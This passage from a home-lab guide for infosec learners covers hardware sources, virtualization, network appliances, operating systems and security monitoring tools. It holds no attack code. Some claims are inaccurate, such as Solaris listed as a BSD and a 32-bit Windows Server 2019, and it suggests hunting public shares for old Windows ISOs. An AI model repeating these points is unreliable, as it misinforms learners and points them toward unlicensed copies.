&lt;p&gt;If you choose to get into password cracking, using &lt;a href=&quot;https://en.bitcoin.it/wiki/Why_a_GPU_mines_faster_than_a_CPU&quot;&gt;GPUs instead of CPUs&lt;/a&gt; increases the cracking speed by a factor of hundreds, if not thousands. However, the specifications of such a machine would need to be different, as power, cooling and space become more of an issue.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Additional Hardware:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;There are a variety of devices that you can find to expand your lab, but it depends on what you want to learn and what you would like to try out. Here are a few devices that you should look into having:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Firewalls/routers/switches&lt;/li&gt;
  &lt;li&gt;Raspberry Pi&lt;/li&gt;
  &lt;li&gt;Wireless access points/wireless network cards&lt;/li&gt;
  &lt;li&gt;IOT devices&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;hunting-for-hardware&quot;&gt;Hunting for Hardware:&lt;/h1&gt;

&lt;p&gt;Depending on the budget you have and the requirements for hardware that you want, there are a variety options to choose for setting up your lab:&lt;/p&gt;

&lt;p&gt;PC Parts/Components:&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://pcpartpicker.com/list/&quot;&gt;https://pcpartpicker.com/list/&lt;/a&gt;: This site is a good start if you want to compare the parts/specs that you may be looking for. In addition, the site includes a price comparison option to show you what retailer is selling the part/component for a lower price. They also have users who share their custom builds to give other people an idea of how they want to build out their computers which you could use to figure out your lab.&lt;/p&gt;

&lt;p&gt;Small Form Factor Builds:&lt;/p&gt;

&lt;p&gt;Raspberry Pi (&lt;a href=&quot;https://www.raspberrypi.org/&quot;&gt;https://www.raspberrypi.org/&lt;/a&gt;): An affordable single-board computer that has the power to run a variety of different projects that can be added to your lab. It has the ability to run different Linux distributions that you can use for your lab projects.&lt;/p&gt;

&lt;p&gt;Intel NUCs (&lt;a href=&quot;https://www.intel.com/content/www/us/en/products/boards-kits/nuc.html&quot;&gt;https://www.intel.com/content/www/us/en/products/boards-kits/nuc.html&lt;/a&gt;): Do not be fooled by the form factor of these mini PCs as they do pack a punch. This would be a good system if you are looking to save power, reduce noise, and most importantly, save space.&lt;/p&gt;

&lt;p&gt;AMD Mini PCs (&lt;a href=&quot;https://www.amd.com/en/products/embedded-minipc-solutions&quot;&gt;https://www.amd.com/en/products/embedded-minipc-solutions&lt;/a&gt;): AMD also has its own line of small form factor computers, and some of them run Ryzen processors.&lt;/p&gt;

&lt;p&gt;Minis Forum (&lt;a href=&quot;https://store.minisforum.com/&quot;&gt;https://store.minisforum.com/&lt;/a&gt;): A place to buy barebone mini PCs for whatever use case you have. They offer custom options you can select for your build, and they are very affordable for what they include.&lt;/p&gt;

&lt;p&gt;Servers:&lt;/p&gt;

&lt;p&gt;As technology continues to be improved, older technology needs to be decommissioned or have an end of life (EOL). As these servers get decommissioned, this is also a good chance to repurpose them for your project. Before you decide to buy a server, you need to answer the following questions:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Do you have enough space to buy a server? What form factor will you be looking to buy (tower or rack)&lt;/li&gt;
  &lt;li&gt;Do you have enough power, and are you okay with the cost of running the server for as long as you keep it on?&lt;/li&gt;
  &lt;li&gt;Does your budget include also buying parts to upgrade/maintain the server?&lt;/li&gt;
  &lt;li&gt;Are you okay if the server is noisy? (There is a reason why we have data centers!)&lt;/li&gt;
  &lt;li&gt;Can you provide sufficient airflow or cooling?&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If you have answered these questions and are okay with your answers, then you are ready to obtain a server! There are a lot of good resources to help you find a server and the hardware you need for it. Here are some resources you can use to help you find a server for your lab:&lt;/p&gt;

&lt;p&gt;Lab Gopher (&lt;a href=&quot;https://labgopher.com/&quot;&gt;https://labgopher.com/&lt;/a&gt;): The best place to look when buying a server! This site lets you parse through servers listed on eBay that match the criteria you are looking for. You can filter on options like RAM, storage, and type of server to find the one you can use for your lab.&lt;/p&gt;

&lt;p&gt;Other places to buy servers:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Save My Server: &lt;a href=&quot;https://www.savemyserver.com/&quot;&gt;https://www.savemyserver.com/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Homelabtech: &lt;a href=&quot;https://www.homelabtech.com/&quot;&gt;https://www.homelabtech.com/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Gear Grabber: &lt;a href=&quot;https://geargrabber.io/&quot;&gt;https://geargrabber.io/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Server Monkey: &lt;a href=&quot;https://www.servermonkey.com/&quot;&gt;https://www.servermonkey.com/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Reddit HomelabSales: &lt;a href=&quot;https://www.reddit.com/r/homelabsales/&quot;&gt;https://www.reddit.com/r/homelabsales/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Local E-Recycling centers&lt;/li&gt;
  &lt;li&gt;Craigslist (be careful with sellers on there!)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Other resources for buying a server/hardware:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Reddit home lab server guide: &lt;a href=&quot;https://www.reddit.com/r/homelab/wiki/hardware&quot;&gt;https://www.reddit.com/r/homelab/wiki/hardware&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;network&quot;&gt;Network:&lt;/h1&gt;

&lt;p&gt;Having your own network setup can give you the ability to build your computer networking skills and to learn more about how your network is operating. Building your own network will allow you to isolate/segment your lab from your personal network, transfer files, and isolate certain systems from accessing the internet.&lt;/p&gt;

&lt;p&gt;If you want to purchase your own network hardware, you should look for network equipment that will be able to utilize the network speed you are receiving from your ISP. However, you can also virtualize your network if you plan to virtualize your entire lab on the hardware you have. You could even use a Raspberry Pi (depending on the model) to run your network firewall or router.&lt;/p&gt;

&lt;p&gt;Finding network hardware:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.reddit.com/r/homelabsales&quot;&gt;https://www.reddit.com/r/homelabsales&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Gear Grabber: &lt;a href=&quot;https://geargrabber.io/&quot;&gt;https://geargrabber.io/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.cablesandkits.com/&quot;&gt;https://www.cablesandkits.com/&lt;/a&gt; (Cisco Lab Equipment)&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;software&quot;&gt;Software:&lt;/h1&gt;

&lt;p&gt;Once you have the hardware set up, it is time to decide what software you want to use for your lab. Here are a few types of software that you should think about implementing:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Virtualization software&lt;/li&gt;
  &lt;li&gt;Network virtual devices&lt;/li&gt;
  &lt;li&gt;Operating systems&lt;/li&gt;
  &lt;li&gt;Daemons/services&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;virtualization-software&quot;&gt;Virtualization Software:&lt;/h1&gt;

&lt;p&gt;There are different types of virtualization software that you can use to run your virtual machines in your lab. One of the main benefits of using virtualization software is you have the ability to create snapshots which allow you to revert the system to a known state. Keep in mind that each virtualization software offers their own benefits depending on the situation you are planning to utilize them in your lab.&lt;/p&gt;

&lt;p&gt;Virtualization software that you can run on your desktop:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;VMware Workstation Player (free, but has limited uses such as running only one virtual machine)&lt;/li&gt;
  &lt;li&gt;VMware Workstation (paid, only for Windows and Linux)&lt;/li&gt;
  &lt;li&gt;VMware Fusion (paid, available for MAC Only)&lt;/li&gt;
  &lt;li&gt;VirtualBox (free, but with performance limitations)&lt;/li&gt;
  &lt;li&gt;Hyper-V (not available for Windows 10 Home)&lt;/li&gt;
  &lt;li&gt;QEMU (free, open source)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Virtualization software that you can run on your server:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;VMware ESXi&lt;/li&gt;
  &lt;li&gt;Hyper-V (Windows Server)&lt;/li&gt;
  &lt;li&gt;Proxmox&lt;/li&gt;
  &lt;li&gt;Xen&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Note: If you are planning to run your hypervisor on a wireless connection, I would recommend using Hyper-V or Proxmox, because VMware ESXi does not ship drivers for wireless devices. Make sure the wireless card you are using supports infrastructure mode.&lt;/p&gt;

&lt;p&gt;Containers:&lt;/p&gt;

&lt;p&gt;When you are setting up a virtualized environment, containers are a good way to run certain applications, services, or tools in an isolated environment. In addition, containers can be spun up and torn down quickly while you are testing a particular program. To run containers in your lab, you will need a host operating system and software to run the containers on it. Here is a list of programs you can use to spin up containers:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Docker (&lt;a href=&quot;https://www.docker.com/&quot;&gt;https://www.docker.com/&lt;/a&gt;): free and easy to use.&lt;/li&gt;
  &lt;li&gt;Vagrant (&lt;a href=&quot;https://www.vagrantup.com/&quot;&gt;https://www.vagrantup.com/&lt;/a&gt;): if you plan to use it with VMware, you will need to buy a license for that.&lt;/li&gt;
  &lt;li&gt;Kubernetes (&lt;a href=&quot;https://kubernetes.io/&quot;&gt;https://kubernetes.io/&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;network-virtual-devices&quot;&gt;Network Virtual Devices:&lt;/h1&gt;

&lt;p&gt;In case you do not have the ability to purchase your own hardware network equipment, you may be able to run some of these network devices as a virtual machine to manage the network in your lab. Here is a list of certain network devices that you can virtualize for your lab.&lt;/p&gt;

&lt;p&gt;Routers:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;GNS3 (&lt;a href=&quot;https://gns3.com/software/download-vm&quot;&gt;https://gns3.com/software/download-vm&lt;/a&gt;): A network software emulator that allows you to simulate the network you are trying to build. In addition, you can leverage your existing hardware and you can expand your lab with the OS.&lt;/li&gt;
  &lt;li&gt;dd-wrt (&lt;a href=&quot;https://dd-wrt.com/&quot;&gt;https://dd-wrt.com/&lt;/a&gt;): Another open source router platform that provides router functionality and additional services for virtual networks. (Note: It is commonly used on hardware devices that support it, but it can be run as a virtual appliance as well.)&lt;/li&gt;
  &lt;li&gt;linux-router (&lt;a href=&quot;https://github.com/garywill/linux-router&quot;&gt;https://github.com/garywill/linux-router&lt;/a&gt;): A Linux script that reconfigures a Linux system to act as a router, hotspot, or transparent proxy server.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Firewalls:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;pfSense (&lt;a href=&quot;https://pfsense.org/&quot;&gt;https://pfsense.org&lt;/a&gt;): An open source firewall with a variety of features that a commercial-class firewall would have. In addition, you can install packages to improve the security of your network.&lt;/li&gt;
  &lt;li&gt;OPNsense (&lt;a href=&quot;https://opnsense.org/&quot;&gt;https://opnsense.org/&lt;/a&gt;): Just like pfSense, with a more polished graphical web interface.&lt;/li&gt;
  &lt;li&gt;ClearOS (&lt;a href=&quot;https://www.clearos.com/&quot;&gt;https://www.clearos.com/&lt;/a&gt;): Another firewall you can play with. Keep in mind, only the community version is free. If you want access to the home version you will need to pay a subscription for it.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;On a Raspberry Pi you could also run Pi-hole (&lt;a href=&quot;https://pi-hole.net/&quot;&gt;https://pi-hole.net/&lt;/a&gt;). Pi-hole is a Linux application that blocks advertisements and Internet trackers at the network level by acting as a DNS sinkhole. Once configured, Pi-hole acts as the DNS server for your private network.&lt;/p&gt;

&lt;h1 id=&quot;operating-systems&quot;&gt;Operating Systems:&lt;/h1&gt;

&lt;p&gt;In infosec it is important to learn both Windows and Linux, because you need to understand the fundamentals of both operating systems. Most corporations have a mix of Windows and Linux systems in their environment that need to be protected. If an attack occurs you will need to assess the affected system, and if you do not know how to analyze both operating systems, you are in trouble. Having these operating systems in your home lab is where you learn the fundamentals of Linux and Windows.&lt;/p&gt;

&lt;h1 id=&quot;windows&quot;&gt;Windows:&lt;/h1&gt;

&lt;p&gt;Due to the license with which Microsoft Windows is distributed, a valid license needs to be purchased to cover the number of instances installed. However, the Microsoft Evaluation Center gives you the ability to run certain operating systems for a certain amount of time (90-120 days).&lt;/p&gt;

&lt;p&gt;Here are the only systems you can get from the Microsoft Evaluation Center: &lt;a href=&quot;https://www.microsoft.com/en-us/evalcenter/&quot;&gt;https://www.microsoft.com/en-us/evalcenter/&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Windows 10 Enterprise (32 or 64 bit)&lt;/li&gt;
  &lt;li&gt;Windows Server 2019 (32 or 64 bit)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Finding old versions of Windows can be tough, but with a little help from Google you can find some shares that host them publicly. Archive.org (&lt;a href=&quot;https://archive.org/&quot;&gt;https://archive.org&lt;/a&gt;) is another place to find older versions of Windows. Take your time to find the versions you are looking for, as some of the files may not be the actual ISOs you need.&lt;/p&gt;

&lt;p&gt;Alternatively, a Visual Studio subscription can be purchased, allowing access to a wide range of Windows versions, both currently for sale and discontinued.&lt;/p&gt;

&lt;p&gt;If you are a college student or have a college email address, you may be able to access OnTheHub. OnTheHub is a discount center for students where they can download products from Microsoft, Adobe, VMware and much more. To check whether your school is registered, look here: &lt;a href=&quot;https://onthehub.com/search&quot;&gt;https://onthehub.com/search&lt;/a&gt;&lt;/p&gt;

&lt;h1 id=&quot;unix-and-nix&quot;&gt;Unix and *Nix:&lt;/h1&gt;

&lt;p&gt;In the beginning there was &lt;a href=&quot;http://www.unix.org/&quot;&gt;UNIX&lt;/a&gt;. This name is trademarked and given to systems which meet the &lt;a href=&quot;http://www.unix.org/what_is_unix/single_unix_specification.html&quot;&gt;Single UNIX Specification (SUS)&lt;/a&gt;. &lt;em&gt;(Using the term UNIX in any other manner &lt;a href=&quot;http://www.unix.org/questions_answers/faq.html#7a&quot;&gt;isn&apos;t technically allowed&lt;/a&gt;.)&lt;/em&gt; From UNIX grew the &lt;a href=&quot;http://www.bsd.org/&quot;&gt;Berkeley Software Distribution (BSD)&lt;/a&gt;, sometimes called Berkeley Unix or BSD UNIX, and similar UNIX-like operating systems which didn&apos;t fully meet the specification. (From BSD UNIX came Darwin, which is the core of Apple OS X &amp;amp; iOS.)&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;BSD - FreeBSD, OpenBSD, Solaris&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;These UNIX-like OSs included MINIX and the various BSDs, which did not fully meet the specification&apos;s criteria. With the growth of these UNIX clones (referred to as *NIX), further variations formed, such as Linux.&lt;/p&gt;

&lt;p&gt;Linux is derived from UNIX in the sense that it continues the basic UNIX design. Linux also refers to the kernel of the GNU/Linux operating system, as the original code was developed by Linus Torvalds and the GNU Foundation. Each Linux distribution consists of a Linux kernel, the GNU system and utilities, libraries, a compiler, additional software, documentation, a window system, a window manager, and a desktop environment.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Linux Debian-based - Example: Debian, Ubuntu, antiX&lt;/li&gt;
  &lt;li&gt;Linux Arch-based - Example: Manjaro, ArcoLinux, Anarchy Linux&lt;/li&gt;
  &lt;li&gt;Linux Slackware-based - Example: Slax, SuSE&lt;/li&gt;
  &lt;li&gt;Linux RPM-based - Example: Red Hat, CentOS, Fedora&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Wikipedia has a detailed family tree of Linux distributions, which can be found &lt;a href=&quot;https://en.wikipedia.org/wiki/List_of_Linux_distributions&quot;&gt;here&lt;/a&gt;. Websites have been set up to track their releases; a good one is &lt;a href=&quot;https://distrowatch.com/&quot;&gt;DistroWatch&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;There is a wide range of operating systems which have been mentioned in the above lines, the vast majority of them free and open source. However, there are a few which are commercial.&lt;/p&gt;

&lt;p&gt;With this in mind, you are able to freely download and try many of these OS types. Using them will help you build up UNIX and *NIX skills, giving you deeper computing knowledge.&lt;/p&gt;

&lt;h1 id=&quot;apple-mac-os&quot;&gt;Apple Mac OS:&lt;/h1&gt;

&lt;p&gt;This OS has been designed to run on Apple&apos;s hardware (using it on non-Apple hardware breaks their EULA). Several virtualization solutions (VMware Fusion and Parallels Desktop; neither is free) support OS X as a guest OS, allowing you to create a VM on which to practice.&lt;/p&gt;

&lt;h1 id=&quot;daemonsservices&quot;&gt;Daemons/Services&lt;/h1&gt;

&lt;p&gt;After you have selected a few operating systems you want to run in your home lab, you should figure out what kind of programs or services you want to run on them. Keep in mind that certain services will only run on certain operating systems, so you will need to make sure you are using the correct operating system to run that desired service.&lt;/p&gt;

&lt;p&gt;Here are a few recommendations of services that you should learn how to set up and play with.&lt;/p&gt;

&lt;p&gt;File/Storage Services:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;FreeNAS (&lt;a href=&quot;https://www.freenas.org/&quot;&gt;https://www.freenas.org/&lt;/a&gt;)&lt;/li&gt;
  &lt;li&gt;OwnCloud (&lt;a href=&quot;https://owncloud.com/&quot;&gt;https://owncloud.com/&lt;/a&gt;)&lt;/li&gt;
  &lt;li&gt;NextCloud (&lt;a href=&quot;https://nextcloud.com/&quot;&gt;https://nextcloud.com/&lt;/a&gt;)&lt;/li&gt;
  &lt;li&gt;Rockstor (&lt;a href=&quot;http://rockstor.com/&quot;&gt;http://rockstor.com/&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Web Services:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Apache (&lt;a href=&quot;https://httpd.apache.org/&quot;&gt;https://httpd.apache.org/&lt;/a&gt;)&lt;/li&gt;
  &lt;li&gt;Apache Tomcat (&lt;a href=&quot;http://tomcat.apache.org/&quot;&gt;http://tomcat.apache.org/&lt;/a&gt;)&lt;/li&gt;
  &lt;li&gt;NGINX (&lt;a href=&quot;https://www.nginx.com/&quot;&gt;https://www.nginx.com/&lt;/a&gt;)&lt;/li&gt;
  &lt;li&gt;Lighttpd (&lt;a href=&quot;https://www.lighttpd.net/&quot;&gt;https://www.lighttpd.net/&lt;/a&gt;)&lt;/li&gt;
  &lt;li&gt;Node.js (&lt;a href=&quot;https://nodejs.org/en/&quot;&gt;https://nodejs.org/en/&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Can only be installed on Windows:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Internet Information Services (IIS) (&lt;a href=&quot;https://www.iis.net/&quot;&gt;https://www.iis.net/&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Other Services:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;DHCP Server&lt;/li&gt;
  &lt;li&gt;DNS Server&lt;/li&gt;
  &lt;li&gt;Mail Server&lt;/li&gt;
  &lt;li&gt;Active Directory (Must be installed through Windows Server)&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;monitoring-servicessystems&quot;&gt;Monitoring Services/Systems:&lt;/h1&gt;

&lt;p&gt;Once you have set up all your services, you are going to need software or systems that bundle a variety of security monitoring tools. After all, if you want to be in infosec you need to understand how certain attacks work and how to defend against them.&lt;/p&gt;

&lt;p&gt;Monitoring Systems:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Security Onion (&lt;a href=&quot;https://securityonion.net/&quot;&gt;https://securityonion.net/&lt;/a&gt;): A Linux-based system that is packed with a variety of open source security monitoring tools that you can test out.&lt;/li&gt;
  &lt;li&gt;T-Pot (&lt;a href=&quot;https://github.com/telekom-security/tpotce&quot;&gt;https://github.com/telekom-security/tpotce&lt;/a&gt;): A Linux-based system that contains a variety of honeypot services you can run to monitor and understand how attackers are trying to access your network. I would recommend spinning this up as a research project for fun.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Monitoring Services:&lt;/p&gt;

&lt;p&gt;Although Security Onion packs a variety of tools into one system, it can be tough to learn all of them at once. It is important to learn how to configure some of these monitoring services manually at first, and a single service might be enough for what you need. Here are some services we recommend looking into, depending on what type of monitoring you want to conduct in your home lab:&lt;/p&gt;

&lt;p&gt;Network Intrusion Detection/Prevention Services:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Snort (&lt;a href=&quot;https://www.snort.org/&quot;&gt;https://www.snort.org/&lt;/a&gt;)&lt;/li&gt;
  &lt;li&gt;Zeek (&lt;a href=&quot;https://zeek.org/&quot;&gt;https://zeek.org/&lt;/a&gt;)&lt;/li&gt;
  &lt;li&gt;Suricata (&lt;a href=&quot;https://suricata-ids.org/&quot;&gt;https://suricata-ids.org/&lt;/a&gt;)&lt;/li&gt;
  &lt;li&gt;OSSEC (&lt;a href=&quot;https://www.ossec.net/&quot;&gt;https://www.ossec.net/&lt;/a&gt;)&lt;/li&gt;
  &lt;li&gt;Moloch (&lt;a href=&quot;https://github.com/aol/moloch&quot;&gt;https://github.com/aol/moloch&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Host-Based Endpoint Detection Services:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Velociraptor (&lt;a href=&quot;https://www.velocidex.com/&quot;&gt;https://www.velocidex.com/&lt;/a&gt;): An open source tool for collecting host-based state information that can be used to hunt/monitor suspicious activities on a system.&lt;/li&gt;
  &lt;li&gt;Bluespawn (&lt;a href=&quot;https://github.com/ION28/BLUESPAWN&quot;&gt;https://github.com/ION28/BLUESPAWN&lt;/a&gt;): An open source endpoint detection and response tool that can be used to identify, detect, and remove malicious activity on a system.&lt;/li&gt;
  &lt;li&gt;Wazuh (&lt;a href=&quot;https://github.com/wazuh/wazuh&quot;&gt;https://github.com/wazuh/wazuh&lt;/a&gt;): An open source host-based intrusion detection system that can detect threats, intrusion attempts, system anomalies, and much more. It has a server that is used to analyze the data and the agent can be installed on different systems to detect these threats.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Endpoint Log Collectors:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Sysmon (&lt;a href=&quot;https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon&quot;&gt;https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon&lt;/a&gt;): A Windows system service that logs detailed system activity to the Windows event log. The information it collects can be forwarded to an event collection program or to a SIEM.&lt;/li&gt;
  &lt;li&gt;osquery (&lt;a href=&quot;https://github.com/osquery/osquery&quot;&gt;https://github.com/osquery/osquery&lt;/a&gt;): An open source tool that lets you query various system information. By writing your own SQL queries, you can use it to detect and analyze various types of threats that could be on the system.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Security Information and Event Management (SIEM) Tools:&lt;/p&gt;

&lt;p&gt;With all of the data you are going to be collecting and reviewing, you are going to need a SIEM to review it all in one place. Security Onion and T-Pot both use Elasticsearch, Logstash, and Kibana to help visualize the data you collect. However, there are other alternatives that people in the infosec community use as their SIEM. Here are some tools you may be interested in playing with:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Splunk (&lt;a href=&quot;https://splunk.com/&quot;&gt;https://splunk.com&lt;/a&gt;): A very popular SIEM tool that enterprise companies use to correlate the data or events in their network. Although Splunk has a free tier, it has a limit to only ingest 500MB of data per day. If you want to expand that limit, you can request a developer license and it will be able to ingest 50GB of data per day. The license will need to be renewed every six months. Here is the link to request a license: &lt;a href=&quot;https://www.splunk.com/en_us/resources/personalized-dev-test-licenses.html&quot;&gt;https://www.splunk.com/en_us/resources/personalized-dev-test-licenses.html&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Graylog (&lt;a href=&quot;https://www.graylog.org/&quot;&gt;https://www.graylog.org/&lt;/a&gt;): Another open source SIEM that can collect logs from almost any device. It has a nice visualization board that you can configure to display the data you want to visualize.&lt;/li&gt;
  &lt;li&gt;HELK (&lt;a href=&quot;https://github.com/Cyb3rWard0g/HELK&quot;&gt;https://github.com/Cyb3rWard0g/HELK&lt;/a&gt;): An open source threat hunting platform built on open source tools such as Elasticsearch, Logstash, and Kibana, with advanced hunting analytics capabilities for reviewing the data ingested into it. The platform is simple and easy to deploy. This community project was founded by Cyb3rWard0g and is still being maintained.&lt;/li&gt;
  &lt;li&gt;DetectionLab (&lt;a href=&quot;https://github.com/clong/DetectionLab&quot;&gt;https://github.com/clong/DetectionLab&lt;/a&gt;): A collection of Packer and Vagrant scripts that builds an entire Active Directory environment with a set of endpoint security tools. The scripts can also implement a variety of logging practices that you can review for testing purposes. The lab is customizable, and it is easy to make modifications in the config scripts.&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;other-resources&quot;&gt;Other Resources:&lt;/h1&gt;

&lt;p&gt;This section contains a variety of links I saved when I was looking to build my home lab.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Hardware:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Ubiquiti: &lt;a href=&quot;https://www.ui.com/products/#default&quot;&gt;https://www.ui.com/products/#default&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Startech (&lt;a href=&quot;https://www.startech.com/&quot;&gt;https://www.startech.com/&lt;/a&gt;): A company to get network equipment/cables from.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Government auction sites to find servers or network equipment:&lt;/p&gt;

&lt;p&gt;Keep in mind what you bid on – if you win the bid you only have a few days to pick it up!&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Public Surplus: &lt;a href=&quot;http://www.publicsurplus.com/&quot;&gt;http://www.publicsurplus.com/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Govdeals: &lt;a href=&quot;https://www.govdeals.com/index.cfm&quot;&gt;https://www.govdeals.com/index.cfm&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Raspberry Pi:&lt;/p&gt;

&lt;p&gt;Building your own Raspberry Pi Cluster:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://magpi.raspberrypi.org/articles/build-a-raspberry-pi-cluster-computer&quot;&gt;https://magpi.raspberrypi.org/articles/build-a-raspberry-pi-cluster-computer&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.howtoraspberry.com/index.php/2020/08/28/din-r-plate-raspberry-pi-rack-system/&quot;&gt;https://www.howtoraspberry.com/index.php/2020/08/28/din-r-plate-raspberry-pi-rack-system/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Cluster Boards:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Turingpi: &lt;a href=&quot;https://turingpi.com/&quot;&gt;https://turingpi.com/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Pi Dramble: &lt;a href=&quot;http://www.pidramble.com/&quot;&gt;http://www.pidramble.com/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Networking:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;pfSense Resources:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Documentation: &lt;a href=&quot;https://docs.netgate.com/pfsense/en/latest/*&quot;&gt;https://docs.netgate.com/pfsense/en/latest/*&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Reddit: &lt;a href=&quot;https://www.reddit.com/r/PFSENSE/&quot;&gt;https://www.reddit.com/r/PFSENSE/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Lawrence Systems PFsense Tutorials: &lt;a href=&quot;https://www.youtube.com/watch?v=fsdm5uc_LsU&amp;amp;list=PLjGQNuuUzvmsuXCoj6g6vm1N-ZeLJso6o&quot;&gt;https://www.youtube.com/watch?v=fsdm5uc_LsU&amp;amp;list=PLjGQNuuUzvmsuXCoj6g6vm1N-ZeLJso6o&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;DD-WRT:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Documentation: &lt;a href=&quot;https://wiki.dd-wrt.com/wiki/index.php/Installation&quot;&gt;https://wiki.dd-wrt.com/wiki/index.php/Installation&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Software:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://github.com/awesome-selfhosted/awesome-selfhosted&quot;&gt;https://github.com/awesome-selfhosted/awesome-selfhosted&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Tools to Draw Network Diagrams:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Online Tools:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Draw.io: &lt;a href=&quot;https://app.diagrams.net/&quot;&gt;https://app.diagrams.net/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Creately: &lt;a href=&quot;https://app.creately.com/diagram/&quot;&gt;https://app.creately.com/diagram/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;LucidChart: &lt;a href=&quot;https://www.lucidchart.com/pages/&quot;&gt;https://www.lucidchart.com/pages/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline Tools:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Microsoft Visio: &lt;a href=&quot;https://www.microsoft.com/en-us/microsoft-365/visio/flowchart-software&quot;&gt;https://www.microsoft.com/en-us/microsoft-365/visio/flowchart-software&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Edraw: &lt;a href=&quot;https://www.edrawsoft.com/edraw-max/&quot;&gt;https://www.edrawsoft.com/edraw-max/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Windows:&lt;/strong&gt;&lt;/p&gt;

